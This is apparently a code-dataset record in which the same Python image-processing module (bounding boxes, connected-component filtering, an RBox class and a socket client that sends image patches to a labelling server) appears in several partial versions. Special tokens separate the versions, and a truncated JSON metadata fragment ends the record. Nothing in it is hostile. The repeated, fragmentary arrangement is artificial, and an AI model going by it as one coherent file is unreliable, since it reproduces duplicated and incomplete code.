xs = margins[0] + np.amin(indicies[1])
xe = margins[0] + np.amax(indicies[1])
return [(xs, ys), (xe, ye)]
<|reserved_special_token_0|>
def findConnectedComponents(frame, threshold=150, blur_radius=1.0):
img = frame.copy()
imgf = ndimage.gaussian_filter(img, blur_radius)
labeled, nr_objects = ndimage.label(imgf > threshold)
return labeled, nr_objects
<|reserved_special_token_0|>
def performColorProcessing(image, mask, iterations=1):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
for i in range(iterations):
model = computePosteriors(image, np.uint8(mask > 0) + 0)
mask = applyModel(image, mask, model)
cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
return mask
<|reserved_special_token_0|>
class RBox:
def __init__(self):
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
return rbox
@staticmethod
def fromPointBoundingBox(box):
rbox = RBox()
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
return (self.x, self.y), (self.x + self.w, self.y + self.h)
def area(self):
return self.h * self.w
def __or__(self, other_box):
rbox = RBox()
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
rbox = RBox()
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
rbox = RBox()
return rbox
def similarity(self, other_box):
min_area = min(self.area(), other_box.area())
return (self & other_box).area() / min_area
def __str__(self):
return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
return self.similarity(other_box)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.w == other
.w and self.h == other.h)
@staticmethod
def similarityStats(boxes):
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold=0.8):
sim_mat = RBox.similarityStats(boxes)
ind = np.array(np.nonzero(sim_mat > threshold))
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
start, end = self.pointBoundingBox()
start, end = list(start), list(end)
if square:
im_h, im_w = image.shape[0:2]
if self.h != self.w:
if self.h > self.w:
diff = self.h - self.w
if start[0] >= int(diff / 2):
start[0] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
return image[start[1]:end[1], start[0]:end[0]]
def addPatchtoImage(self, image, patch):
start, end = self.pointBoundingBox()
image[start[1]:end[1], start[0]:end[0]] = patch
return image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_margined_bounding_boxes(fimage, lables, margins):
boxes = []
for lable in lables:
labled = (fimage == lable) + 0
box = find_bounding_box(labled, margins)
boxes.append(box)
return boxes
def find_bounding_box(binary_matrix, margins=(0, 0)):
indicies = np.array(np.nonzero(binary_matrix + 0))
ys = margins[1] + np.amin(indicies[0])
ye = margins[1] + np.amax(indicies[0])
xs = margins[0] + np.amin(indicies[1])
xe = margins[0] + np.amax(indicies[1])
return [(xs, ys), (xe, ye)]
<|reserved_special_token_0|>
def findConnectedComponents(frame, threshold=150, blur_radius=1.0):
img = frame.copy()
imgf = ndimage.gaussian_filter(img, blur_radius)
labeled, nr_objects = ndimage.label(imgf > threshold)
return labeled, nr_objects
<|reserved_special_token_0|>
def performColorProcessing(image, mask, iterations=1):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
for i in range(iterations):
model = computePosteriors(image, np.uint8(mask > 0) + 0)
mask = applyModel(image, mask, model)
cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
return mask
<|reserved_special_token_0|>
def killSmallLables(frame, threshold=150):
initial_weights = np.array([np.sum(frame == lable) for lable in range(
np.amax(frame) + 1)])
final_probs = initial_weights < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
if dying:
frame -= np.uint8(np.uint8(frame == lable) * lable)
return frame
class RBox:
def __init__(self):
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
return rbox
@staticmethod
def fromPointBoundingBox(box):
rbox = RBox()
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
return (self.x, self.y), (self.x + self.w, self.y + self.h)
def area(self):
return self.h * self.w
def __or__(self, other_box):
rbox = RBox()
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
rbox = RBox()
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
rbox = RBox()
return rbox
def similarity(self, other_box):
min_area = min(self.area(), other_box.area())
return (self & other_box).area() / min_area
def __str__(self):
return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
return self.similarity(other_box)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.w == other
.w and self.h == other.h)
@staticmethod
def similarityStats(boxes):
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold=0.8):
sim_mat = RBox.similarityStats(boxes)
ind = np.array(np.nonzero(sim_mat > threshold))
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
start, end = self.pointBoundingBox()
start, end = list(start), list(end)
if square:
im_h, im_w = image.shape[0:2]
if self.h != self.w:
if self.h > self.w:
diff = self.h - self.w
if start[0] >= int(diff / 2):
start[0] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
return image[start[1]:end[1], start[0]:end[0]]
def addPatchtoImage(self, image, patch):
start, end = self.pointBoundingBox()
image[start[1]:end[1], start[0]:end[0]] = patch
return image
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def find_bounding_boxes(fimage, lables):
boxes = []
for lable in lables:
labled = (fimage == lable) + 0
box = find_bounding_box(labled)
boxes.append(box)
return boxes
def find_margined_bounding_boxes(fimage, lables, margins):
boxes = []
for lable in lables:
labled = (fimage == lable) + 0
box = find_bounding_box(labled, margins)
boxes.append(box)
return boxes
def find_bounding_box(binary_matrix, margins=(0, 0)):
indicies = np.array(np.nonzero(binary_matrix + 0))
ys = margins[1] + np.amin(indicies[0])
ye = margins[1] + np.amax(indicies[0])
xs = margins[0] + np.amin(indicies[1])
xe = margins[0] + np.amax(indicies[1])
return [(xs, ys), (xe, ye)]
<|reserved_special_token_0|>
def weightFilterMini(image, weight):
image = np.uint8(image)
image, contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2
.CHAIN_APPROX_SIMPLE)
final_contours = []
for cnt in contours:
if cv2.contourArea(cnt) >= weight:
final_contours.append(cnt)
fimage = np.zeros(image.shape[:2], np.uint8)
cv2.drawContours(fimage, final_contours, -1, 255, -1)
boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes([cv2.
boundingRect(cnt) for cnt in final_contours]))
return fimage, boxes
def weightFilterMargined(image, lables, weight, margins):
max = 0
weights = np.zeros(lables)
fimage = np.zeros_like(image)
retained_lables = []
for i in range(lables):
weights[i] = np.sum(np.sum(image == i))
if weights[i] > weights[max]:
max = i
if weights[i] > weight:
fimage += np.uint8((image == i) + 0)
retained_lables.append(i)
fimage -= np.uint8(image == max)
fimage = np.uint8(fimage * 255)
boxes = []
if len(retained_lables) > 0:
retained_lables.remove(max)
boxes = find_margined_bounding_boxes(image.copy(), retained_lables,
margins)
return fimage, boxes
def calculatePossiblePadding(box, shape, default=20):
w_pad = default
h_pad = default
if default == 0:
rbox = RBox.fromPointBoundingBox(box)
w_pad = round(0.205 * rbox.w)
h_pad = round(0.205 * rbox.h)
height, width = shape[0:2]
(x_start, y_start), (x_end, y_end) = box
pad_x_start = h_pad
if y_start - pad_x_start < 0:
pad_x_start = y_start
pad_y_start = w_pad
if x_start - pad_y_start < 0:
pad_y_start = x_start
pad_x_end = w_pad
if y_end + pad_x_end >= height:
pad_x_end = height - y_end - 1
pad_y_end = h_pad
if x_end + pad_y_end >= width:
pad_y_end = width - x_end - 1
return pad_x_start, pad_x_end, pad_y_start, pad_y_end
def findConnectedComponents(frame, threshold=150, blur_radius=1.0):
img = frame.copy()
imgf = ndimage.gaussian_filter(img, blur_radius)
labeled, nr_objects = ndimage.label(imgf > threshold)
return labeled, nr_objects
def drawBoundingBox(im, start, end, color):
cv2.rectangle(im, start, end, color, 1)
<|reserved_special_token_0|>
def extractPatch(im, box):
x1, x2, y1, y2 = box
return im[x1:x2, y1:y2, :]
def randomColor():
return np.random.randint(0, 255, (1, 3))[0].tolist()
def performColorProcessing(image, mask, iterations=1):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
for i in range(iterations):
model = computePosteriors(image, np.uint8(mask > 0) + 0)
mask = applyModel(image, mask, model)
cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
return mask
def killDyingLables(frame, mask, threshold=0.5):
initial_weights = np.array([np.sum(frame == lable) for lable in range(
np.amax(frame) + 1)]) + 1e-05
labled_frame = frame * mask
final_weights = np.array([np.sum(labled_frame == lable) for lable in
range(np.amax(frame) + 1)])
final_probs = final_weights / initial_weights < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
if dying:
labled_frame -= np.uint8((labled_frame == lable) * lable)
return labled_frame
def killSmallLables(frame, threshold=150):
initial_weights = np.array([np.sum(frame == lable) for lable in range(
np.amax(frame) + 1)])
final_probs = initial_weights < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
if dying:
frame -= np.uint8(np.uint8(frame == lable) * lable)
return frame
class RBox:
def __init__(self):
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
rbox = RBox()
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
return rbox
@staticmethod
def fromPointBoundingBox(box):
rbox = RBox()
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
return (self.x, self.y), (self.x + self.w, self.y + self.h)
def area(self):
return self.h * self.w
def __or__(self, other_box):
rbox = RBox()
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
rbox = RBox()
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
rbox = RBox()
return rbox
def similarity(self, other_box):
min_area = min(self.area(), other_box.area())
return (self & other_box).area() / min_area
def __str__(self):
return '{} {} {} {}'.format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
return self.similarity(other_box)
def __eq__(self, other):
return (self.x == other.x and self.y == other.y and self.w == other
.w and self.h == other.h)
@staticmethod
def similarityStats(boxes):
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold=0.8):
sim_mat = RBox.similarityStats(boxes)
ind = np.array(np.nonzero(sim_mat > threshold))
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
start, end = self.pointBoundingBox()
start, end = list(start), list(end)
if square:
im_h, im_w = image.shape[0:2]
if self.h != self.w:
if self.h > self.w:
diff = self.h - self.w
if start[0] >= int(diff / 2):
start[0] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
return image[start[1]:end[1], start[0]:end[0]]
def addPatchtoImage(self, image, patch):
start, end = self.pointBoundingBox()
image[start[1]:end[1], start[0]:end[0]] = patch
return image
def askForLable(patch):
cv2.imwrite('patch.jpg', patch)
clientSock = socket(AF_INET, SOCK_STREAM)
clientSock.connect((TCP_IP, TCP_PORT))
image = open('patch.jpg', 'rb')
data = image.read(BUFFER_SIZE)
while data:
clientSock.send(data)
data = image.read(BUFFER_SIZE)
image.close()
clientSock.shutdown(SHUT_WR)
label = clientSock.recv(1024)
label = label.decode('utf-8')
return label
<|reserved_special_token_1|>
import numpy as np
import cv2
from pixcel import *
from scipy import ndimage
import math
from socket import *
from config import *
from time import time
def find_bounding_boxes(fimage, lables):
# initialize boxes array
boxes = []
for lable in lables:
# iterate all lables
# filter out image pixels with current lable
labled = (fimage == lable) + 0
# find indexes
box = find_bounding_box(labled)
# append found bouding box
boxes.append(box)
return boxes
def find_margined_bounding_boxes(fimage, lables, margins):
# initialize boxes array
boxes = []
for lable in lables:
# iterate all lables
# filter out image pixels with current lable
labled = (fimage == lable) + 0
# find indexes
box = find_bounding_box(labled, margins)
# append found bouding box
boxes.append(box)
return boxes
def find_bounding_box(binary_matrix, margins=(0, 0)):
# extract indexes of foreground pixels
indicies = np.array(np.nonzero(binary_matrix + 0))
# get contours
ys = margins[1] + np.amin(indicies[0])
ye = margins[1] + np.amax(indicies[0])
xs = margins[0] + np.amin(indicies[1])
xe = margins[0] + np.amax(indicies[1])
# return contours
return [(xs, ys), (xe, ye)]
def weightFilter(image, lables, weight):
max = 0
weights = np.zeros((lables))
fimage = np.zeros_like(image)
retained_lables = []
for i in range(lables):
weights[i] = np.sum(np.sum(image == i))
if weights[i] > weights[max]:
max = i
if weights[i] > weight:
fimage += np.uint8((image == i) + 0)
retained_lables.append(i)
fimage -= np.uint8((image == max) + 0)
fimage = np.uint8(fimage * 255)
boxes = []
if (len(retained_lables) > 0):
retained_lables.remove(max)
boxes = find_bounding_boxes(image.copy(), retained_lables)
return fimage, boxes
def weightFilterMini(image, weight):
image = np.uint8(image)
# extract contours
image, contours, hierarchy = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
final_contours = []
for cnt in contours:
if cv2.contourArea(cnt) >= weight:
# add it to final_contours
final_contours.append(cnt)
fimage = np.zeros((image.shape[:2]), np.uint8)
cv2.drawContours(fimage, final_contours, -1, 255, -1)
boxes = RBox.toPointBoundingBoxes(RBox.fromClassicalBoundingBoxes([cv2.boundingRect(cnt) for cnt in final_contours]))
return fimage, boxes
def weightFilterMargined(image, lables, weight, margins):
max = 0
weights = np.zeros((lables))
fimage = np.zeros_like(image)
retained_lables = []
for i in range(lables):
weights[i] = np.sum(np.sum(image == i))
if weights[i] > weights[max]:
max = i
if weights[i] > weight:
fimage += np.uint8((image == i) + 0)
retained_lables.append(i)
fimage -= np.uint8(image == max)
fimage = np.uint8(fimage * 255)
boxes = []
if (len(retained_lables) > 0):
retained_lables.remove(max)
boxes = find_margined_bounding_boxes(image.copy(), retained_lables, margins)
return fimage, boxes
def calculatePossiblePadding(box, shape, default = 20):
w_pad = default
h_pad = default
# dynamic padding
if default == 0:
rbox = RBox.fromPointBoundingBox(box)
w_pad = round(0.205 * rbox.w)
h_pad = round(0.205 * rbox.h)
# extract with and height from shape
height, width = shape[0:2]
# extract starting, ending x and y from box
((x_start, y_start), (x_end, y_end)) = box
# check if is it possible to add certain padding
# if not add possible padding for all 4 points
pad_x_start = h_pad
if y_start - pad_x_start < 0:
pad_x_start = y_start
pad_y_start = w_pad
if x_start - pad_y_start < 0:
pad_y_start = x_start
pad_x_end = w_pad
if y_end + pad_x_end >= height:
pad_x_end = height - y_end - 1
pad_y_end = h_pad
if x_end + pad_y_end >= width:
pad_y_end = width - x_end - 1
# return resultant padding
return pad_x_start, pad_x_end, pad_y_start, pad_y_end
def findConnectedComponents(frame, threshold = 150, blur_radius = 1.0):
img = frame.copy() # gray-scale image
# smooth the image (to remove small objects)
imgf = ndimage.gaussian_filter(img, blur_radius)
# find connected components
labeled, nr_objects = ndimage.label(imgf > threshold)
return labeled, nr_objects
def drawBoundingBox(im, start, end, color):
cv2.rectangle(im, start, end, color, 1)
def pwpBasedTracking(image, frame_models, threshold):
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (7, 7))
predicted = np.zeros((image.shape[0:2]), np.uint8)
# FOREACH GIVEN PATCH AND ITS MODEL, APPLY MODEL TO PATCH
for fm in frame_models:
patch = extractPatch(image, fm[1])
#patch = cv2.medianBlur(patch, 5)
mask = np.zeros(patch.shape[0:2], np.uint8)
res = applyModel(patch, mask, fm[0])
res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)
res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)
res = cv2.morphologyEx(res, cv2.MORPH_OPEN, kernel)
res = cv2.morphologyEx(res, cv2.MORPH_CLOSE, kernel)
if(len(np.nonzero(res)[0]) > max(fm[2] * threshold, 10) ):
predicted[fm[1][0]: fm[1][1], fm[1][2]: fm[1][3]] += res;
return predicted
def extractPatch(im, box):
# extract coordinates
x1, x2, y1, y2 = box
# extract and return patch
return im[x1: x2, y1: y2, :]
def randomColor():
return np.random.randint(0, 255, (1, 3))[0].tolist()
def performColorProcessing(image, mask, iterations = 1):
# initialize kernel
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
for i in range(iterations):
model = computePosteriors(image, np.uint8(mask > 0) + 0)
mask = applyModel(image, mask, model)
cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel=kernel)
return mask
def killDyingLables(frame, mask, threshold = 0.5):
# get initial weights of lables
initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)]) + 0.00001
# get final labled frame
labled_frame = frame * mask
# get final weights
final_weights = np.array([np.sum(labled_frame == lable) for lable in range(np.amax(frame) + 1)])
# final probabilites
final_probs = (final_weights/initial_weights) < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
# check is lable is dying
if dying:
# kill lable
labled_frame -= np.uint8((labled_frame == lable) * lable)
# return final labled frame
return labled_frame
def killSmallLables(frame, threshold = 150):
# get initial weights of lables
initial_weights = np.array([np.sum(frame == lable) for lable in range(np.amax(frame) + 1)])
# final probabilites
final_probs = initial_weights < threshold
for lable in range(len(final_probs)):
dying = final_probs[lable]
# check is lable is dying
if dying:
# kill lable
frame -= np.uint8(np.uint8(frame == lable) * lable)
# return final labled frame
return frame
class RBox:
def __init__(self):
# initialize atributes
self.x = 0
self.y = 0
self.w = 0
self.h = 0
@staticmethod
def fromClassicalBoundingBox(box):
# initialize rbox
rbox = RBox()
# copy attributes
rbox.x = box[0]
rbox.y = box[1]
rbox.w = box[2]
rbox.h = box[3]
# return rbox
return rbox
@staticmethod
def fromClassicalBoundingBoxes(boxes):
return [RBox.fromClassicalBoundingBox(box) for box in boxes]
@staticmethod
def fromRoughBoundingBox(box):
# initialize rbox
rbox = RBox()
# copy attributes
rbox.x = box[0]
rbox.y = box[2]
rbox.h = box[1] - box[0]
rbox.w = box[3] - box[2]
# return rbox
return rbox
@staticmethod
def fromPointBoundingBox(box):
# initialize rbox
rbox = RBox()
# copy attributes
rbox.x = box[0][0]
rbox.y = box[0][1]
rbox.w = box[1][0] - box[0][0]
rbox.h = box[1][1] - box[0][1]
# return rbox
return rbox
@staticmethod
def fromPointBoundingBoxes(boxes):
return [RBox.fromPointBoundingBox(box) for box in boxes]
def classicalBoundingBox(self):
# return array like bounding box
return [self.x, self.y, self.w, self.h]
def pointBoundingBox(self):
# return tuple of end points
return ((self.x, self.y), (self.x + self.w, self.y + self.h))
def area(self):
return self.h * self.w
def __or__(self, other_box):
# initialize resultant box
rbox = RBox()
# calculate values
rbox.x = min(self.x, other_box.x)
rbox.y = min(self.y, other_box.y)
rbox.w = max(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = max(self.y + self.h, other_box.y + other_box.h) - rbox.y
return rbox
def __and__(self, other_box):
# initialize resultant box
rbox = RBox()
# calculate values
rbox.x = max(self.x, other_box.x)
rbox.y = max(self.y, other_box.y)
rbox.w = min(self.x + self.w, other_box.x + other_box.w) - rbox.x
rbox.h = min(self.y + self.h, other_box.y + other_box.h) - rbox.y
if rbox.w < 0 or rbox.h < 0:
# reinitailize or make it zero
rbox = RBox()
return rbox
def similarity(self, other_box):
# (A & B)/(A | B) = (A & B).area/(A.area + B.area - (A & B).area)
#return (self & other_box).area()/(self.area() + other_box.area() - (self & other_box).area())
min_area = min(self.area(), other_box.area())
return (self & other_box).area()/min_area
def __str__(self):
return "{} {} {} {}".format(self.x, self.y, self.w, self.h)
def __mul__(self, other_box):
# calculate similarity and return
return self.similarity(other_box)
def __eq__(self, other):
return self.x == other.x and self.y == other.y and self.w == other.w and self.h == other.h
@staticmethod
def similarityStats(boxes):
# create matrix out of boxes
sim_mat = np.array(boxes).reshape((-1, 1))
sim_mat = np.tril(sim_mat.dot(sim_mat.T), -1)
# return similarity matrix
return sim_mat
@staticmethod
def similarityThreshold(boxes, threshold = 0.8):
# get similarity matrix
sim_mat = RBox.similarityStats(boxes)
# find thresholded indexes
ind = np.array(np.nonzero(sim_mat > threshold))
# return in the form of list
return list(ind.T)
@staticmethod
def reduceBoxes(boxes, threshold=0.8):
similar_boxes = RBox.similarityThreshold(boxes, threshold)
while len(similar_boxes) > 0:
union = boxes[similar_boxes[0][1]] | boxes[similar_boxes[0][0]]
# remove similar boxes
del boxes[similar_boxes[0][0]]
del boxes[similar_boxes[0][1]]
boxes.append(union)
similar_boxes = RBox.similarityThreshold(boxes, threshold)
return boxes
@staticmethod
def toPointBoundingBoxes(boxes):
return [box.pointBoundingBox() for box in boxes]
@staticmethod
def toClassicBoundingBoxes(boxes):
return [box.classicalBoundingBox() for box in boxes]
def extractPatchFromImage(self, image, square=False):
# get bounding box end points
(start, end) = self.pointBoundingBox()
start, end = list(start), list(end)
# check if square flag is on
if square:
im_h, im_w = image.shape[0:2]
# adjust start and end so that height and width are equal
if self.h != self.w:
# find bigger size
if self.h > self.w:
# find difference
diff = self.h - self.w
if start[0] >= int(diff/2):
start[0] -= math.floor(diff/2)
diff -= math.floor(diff/2)
else:
diff -= start[0]
start[0] = 0
end[0] += diff
if end[0] >= im_w:
diff = end[0] - im_w + 1
end[1] -= diff
else:
# find difference
diff = self.w - self.h
if start[1] >= int(diff / 2):
start[1] -= math.floor(diff / 2)
diff -= math.floor(diff / 2)
else:
diff -= start[1]
start[1] = 0
end[1] += diff
if end[1] >= im_h:
diff = end[1] - im_h + 1
end[0] -= diff
# return patch
return image[start[1]: end[1], start[0]: end[0]]
def addPatchtoImage(self, image, patch):
# get bounding box end points
(start, end) = self.pointBoundingBox()
# patch in to image
image[start[1]: end[1], start[0]: end[0]] = patch
# return image
return image
def askForLable(patch):
# write an image to send
cv2.imwrite("patch.jpg", patch)
# setup client socket
clientSock = socket(AF_INET, SOCK_STREAM)
clientSock.connect((TCP_IP, TCP_PORT))
# open image
image = open("patch.jpg", 'rb')
# read bytes equal to buffer size
data = image.read(BUFFER_SIZE)
# while image still has data
while (data):
# send data to server
clientSock.send(data)
# read more data if available
data = image.read(BUFFER_SIZE)
# close file
image.close()
# signal server to end data stream
clientSock.shutdown(SHUT_WR)
# recieved lable as binary data from server and convert it to string
label = clientSock.recv(1024)
label = label.decode("utf-8")
return label
|
flexible
|
{
"blob_id": "f3895f38be29fb07903237d8846cc9d657b39ea9",
"index": 6495,
"step-1": "<mask token>\n\n\nclass RBox:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.w = 0\n self.h = 0\n\n @staticmethod\n def fromClassicalBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[1]\n rbox.w = box[2]\n rbox.h = box[3]\n return rbox\n\n @staticmethod\n def fromClassicalBoundingBoxes(boxes):\n return [RBox.fromClassicalBoundingBox(box) for box in boxes]\n\n @staticmethod\n def fromRoughBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0]\n rbox.y = box[2]\n rbox.h = box[1] - box[0]\n rbox.w = box[3] - box[2]\n return rbox\n\n @staticmethod\n def fromPointBoundingBox(box):\n rbox = RBox()\n rbox.x = box[0][0]\n rbox.y = box[0][1]\n rbox.w = box[1][0] - box[0][0]\n rbox.h = box[1][1] - box[0][1]\n return rbox\n\n @staticmethod\n def fromPointBoundingBoxes(boxes):\n return [RBox.fromPointBoundingBox(box) for box in boxes]\n\n def classicalBoundingBox(self):\n return [self.x, self.y, self.w, self.h]\n\n def pointBoundingBox(self):\n return (self.x, self.y), (self.x + self.w, self.y + self.h)\n\n def area(self):\n return self.h * self.w\n\n def __or__(self, other_box):\n rbox = RBox()\n rbox.x = min(self.x, other_box.x)\n rbox.y = min(self.y, other_box.y)\n rbox.w = max(self.x + self.w, other_box.x + other_box.w) - 